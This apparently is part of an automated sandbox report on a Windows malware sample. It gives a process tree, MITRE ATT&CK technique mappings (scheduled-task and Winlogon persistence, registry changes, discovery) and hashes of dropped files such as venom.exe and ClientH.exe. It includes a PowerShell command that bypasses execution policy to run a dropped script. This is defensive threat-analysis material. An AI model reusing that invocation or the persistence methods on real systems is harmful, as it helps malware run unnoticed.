        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6860

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2112

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6196 -ip 6196
1⤵
PID:7276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\LED\ISO\LED.bat

Filesize
91B

MD5
6abfc25214c714a99b96ecb5b96896ac

SHA1
efb7ae16e25de7bc5d3c2984f7b3737e81027916

SHA256
ce440dae462e4ff608e1c370d891a29e08b78e26a2cdad2dfb09e4f4a48927e6

SHA512
cd64b402e23956e3097e0743002df1245f883b8b78a7155db8a066b573137cfaf10c152e3515902af022755f2a2b2b26b2c29f80943bd733d0b16bcdcd3f5160

Download Submit
C:\ProgramData\LED\ISO\LED.ps1

Filesize
248KB

MD5
2b9b1254123fbce6cab39d5e3a5e9c9c

SHA1
94738cf8dc768668bcfe20b4db5410d91ca3b84b

SHA256
32a23a3520d7bd82e7be89c4c8f7e2c6e66aa761349202730e8a31d4f41a1ad5

SHA512
6f7bc188cd5457171d86f0620eaeacfd75cd3fa53ffea2ce4876d44a8aeeb8c161eb7e55e19eb25a270a8f91d126d6619032a67e15a36a2b54311eebe7f05a70

Download Submit
C:\ProgramData\LED\ISO\LED.vbs

Filesize
879B

MD5
043a4b34e2964e37bd1fb6fbe8d4c5c2

SHA1
5a0dd9ea2b7f2bbafe9a7f205f29de05ccd55960

SHA256
0826e3930f8f93510820aefbe1e2617950910e0d86d8df3701fcb3e9a4420032

SHA512
9a9cf949eb499c20dcfa817613c1ecba84132901c0b56a74e06fe134e39497de6e319f6aa42799e5e0d4f1ae2f737d102f9d84c73b4e4eff864ed01697dcba6e

Download Submit
C:\ProgramData\LED\ISO\Panel.bat

Filesize
89B

MD5
96fc59e30dc3c5c456ec100c27e030e9

SHA1
abb4f73f1ccc4dfc4a7cc8930c42e259c1744faf

SHA256
8eb0194abaf381c26bda39ac125bdf78dcbbdba3d032a52f7cafa371abacd8c0

SHA512
0a122781b5e8503bf92886c50e89fd3b598885c3b53e126d6267fbf3e2de1ab6d5f0f295566445e15e7aba5b84b3d5da07eb7828933451fae1aa53068d20a162

Download Submit
C:\ProgramData\LED\ISO\Panel.ps1

Filesize
3KB

MD5
fdfdc4a9ff59381618fd2537348631df

SHA1
4085f91b0d89b0f25a92946a175b70f72d846af6

SHA256
b162be17f5a052a4f99bc0a64adad887d494f4aa61b112df04fca25143e7020b

SHA512
171b1eb7cbf49e94744d2c4c82cb0f2c5950a68ee61e2eeb62d80be22fc57fa6f0e6f2ed435ae9626a65f910aa66f59a72a7f8dae228e731dba6c1285eddff4e

Download Submit
C:\ProgramData\LED\ISO\Panel.vbs

Filesize
572B

MD5
6768c6ef46d88a3a0551b00a59ca0920

SHA1
369ab3e646835e01e36d3ef0d1c215dbe8645c48

SHA256
8bfe3b92630e2d40df2e2e1b1e700f35edd692e86183a7de303b1d10f91ef542

SHA512
6102b8ca2f88e55b6c98702dffa2d5e1589525a39ee0724fa6a9cef03f5c5ab19d6e6640d2541259f9dd87ac708661fe7e2e4d439f677cc84f16cf1a1e8d46db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\venom.exe.log

Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ClientH.exe.log

Filesize
418B

MD5
98eea38457c9976c0ec48b5a70964041

SHA1
281ec6ada096be89ade13852ca86edfe42ffe3c1

SHA256
4a7455429d6f3c7390f97bc406d0bcc7d64ddff6bee5ffa9e88c5a75f806bfcf

SHA512
adb7bb4e1434d743932890aede4daa55c6e9f091415292775313dd172949fbd415f124c97e017a8204aab530b6184f196ab5cce005781b0853ffccc620f07530

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
45e6056110c2b4389f7155bd39b275f9

SHA1
8d21a2498bc928a7ab4d701d595aa1b48b01a4a0

SHA256
e1c25abc7aa2f50007c3088e5fc7aafb710beb3668a3ea890b1234606f6d7295

SHA512
d896ade4822c11d33355d9587fe47196694a611fe75dfb50a0e47901091af8dd2a4b3fe3fd89e0ac001baf03c853f1d81c8eec9e446e6cd63f8ca99d3eb473ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ClientH.exe

Filesize
90KB

MD5
63999d7403b272a3fa02167440049a33

SHA1
35c5b45786fcf72749c2b76ce32d770604b38f9b

SHA256
1797c87878d7ea2a8f56f7a27bd0f917c511186a30a9f4bfed054ba65ebb56b7

SHA512
d945e73b710adc6a4e8aea56d3cc3f61ce7da4f4d2d6edb00579f3f49a7b3cbd43b94a4c47848345ba23088b2e7d996514619b868217faa4ac46b89a264fb301

Download Submit
C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe

Filesize
8.8MB

MD5
11f3d124b89d4c6a737f993442e15259

SHA1
290b45651633021d3afd4bdedf8f03c2c705cf11

SHA256
80d1631227d5b253b69f1004286c4562e765d54be593ac0b6ad0d34b35275f94

SHA512
43822db6a9dd226579c136e7049012714fb54ca4915fdf4b4ba92e2a72380b1b56de7a9a6cef79e9b62139e36244812955ca4bb2ff8991f03ef96f929d95b4f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs

Filesize
896B

MD5
8fb276ac35a3a884b76803313460e489

SHA1
93618fd292722ed49e668cdf00f75cb5a58ae402

SHA256
fefd5dae1f3c47da60f619f7423e8528e8acc80aa31e963a14e9f3e9be8df334

SHA512
51d963b008f4cbb1fc0844c8147f51c2375754f3db58d588a279f164ceb2c902f66d067e3143e0ddc2f981bcc46195c60177822074c7ff0f79945ee45ec7e5c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukosfijy.ph0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCC1A.tmp.bat

Filesize
150B

MD5
e5b8fd60372c56d1decf904606d6bbd9

SHA1
8eda3fe7837f251d989f7b9b1e8591b4a5dee230

SHA256
a2e5ef859f9e1c843d40b6e814830b0e24b68d8997035ad76f45df6f3f42366e

SHA512
22269517a67e38c809a44eda9ecba95b93d3ce04e4418a8c7bba5de2d133db820fba9edf8e96380488ada15cfded787fcc3ff53c3b3048f04e8d9fba9281779b

Download Submit
C:\Users\Admin\AppData\Local\Temp\venom.exe

Filesize
63KB

MD5
397f5b1c5cbba64b357dcdbc041c0c76

SHA1
ab368a38ad1e26a00e5828fecc6d092669da8ff6

SHA256
2bacc73b133acd79185f75edd32b60f24bb23d9ad08125ccc36cbd2d389ce2e4

SHA512
bc7fe11c434d4c13e7800d620904c43a19a00a571f74b19a794001041c796d34196800dae3e3f4db67e832d20e865a476ad002c40ebf9f25a6295642ce09b490

Download Submit
memory/332-38-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1008-1099-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/1232-942-0x000001F8EFE00000-0x000001F8F172F000-memory.dmp

Filesize
25.2MB

Download
memory/1232-858-0x000001F8EFE00000-0x000001F8F172F000-memory.dmp

Filesize
25.2MB

Download
memory/1232-708-0x000001F8EFE00000-0x000001F8F172F000-memory.dmp

Filesize
25.2MB

Download
memory/1232-563-0x000001F8EFE00000-0x000001F8F172F000-memory.dmp

Filesize
25.2MB

Download
memory/1232-468-0x00000200F27A0000-0x00000200F27C0000-memory.dmp

Filesize
128KB

Download
memory/1232-469-0x00000200F2DB0000-0x00000200F2DD0000-memory.dmp

Filesize
128KB

Download
memory/1232-438-0x00000200F27E0000-0x00000200F2800000-memory.dmp

Filesize
128KB

Download
memory/1232-422-0x00000200F1830000-0x00000200F1930000-memory.dmp

Filesize
1024KB

Download
memory/1564-37-0x00000000055D0000-0x000000000566C000-memory.dmp

Filesize
624KB

Download
memory/1564-32-0x0000000000C10000-0x0000000000C2C000-memory.dmp

Filesize
112KB

Download
memory/2560-549-0x0000000003380000-0x0000000003381000-memory.dmp

Filesize
4KB

Download
memory/2952-104-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/2952-108-0x00000000060C0000-0x0000000006414000-memory.dmp

Filesize
3.3MB

Download
memory/2952-57-0x0000000005760000-0x0000000005D88000-memory.dmp

Filesize
6.2MB

Download
memory/2952-56-0x0000000002ED0000-0x0000000002F06000-memory.dmp

Filesize
216KB

Download
memory/2952-103-0x0000000005F00000-0x0000000005F66000-memory.dmp

Filesize
408KB

Download
memory/2952-95-0x00000000056E0000-0x0000000005702000-memory.dmp

Filesize
136KB

Download
memory/2952-317-0x0000000007A00000-0x0000000007A96000-memory.dmp

Filesize
600KB

Download
memory/2952-318-0x0000000007990000-0x00000000079B2000-memory.dmp

Filesize
136KB

Download
memory/2952-247-0x0000000007FE0000-0x000000000865A000-memory.dmp

Filesize
6.5MB

Download
memory/2952-248-0x0000000007770000-0x000000000778A000-memory.dmp

Filesize
104KB

Download
memory/2952-152-0x0000000006500000-0x000000000654C000-memory.dmp

Filesize
304KB

Download
memory/2952-149-0x00000000060A0000-0x00000000060BE000-memory.dmp

Filesize
120KB

Download
memory/3132-35-0x0000000005070000-0x0000000005614000-memory.dmp

Filesize
5.6MB

Download
memory/3240-1343-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/3708-1110-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/3848-1385-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/4560-53-0x0000000005160000-0x00000000051F2000-memory.dmp

Filesize
584KB

Download
memory/4980-27-0x0000000000770000-0x0000000000786000-memory.dmp

Filesize
88KB

Download
memory/4980-28-0x00007FFE161D3000-0x00007FFE161D5000-memory.dmp

Filesize
8KB

Download
memory/6008-1319-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/6460-1398-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/6860-1031-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/6860-1088-0x0000000007C60000-0x0000000007C71000-memory.dmp

Filesize
68KB

Download
memory/6860-1062-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

Filesize
40KB

Download
memory/6860-1043-0x0000000006DB0000-0x0000000006DCE000-memory.dmp

Filesize
120KB

Download
memory/6860-1030-0x00000000079B0000-0x00000000079E2000-memory.dmp

Filesize
200KB

Download
memory/6860-1044-0x00000000079F0000-0x0000000007A93000-memory.dmp

Filesize
652KB

Download
memory/7400-1274-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download
memory/7980-1228-0x00000000743F0000-0x000000007443C000-memory.dmp

Filesize
304KB

Download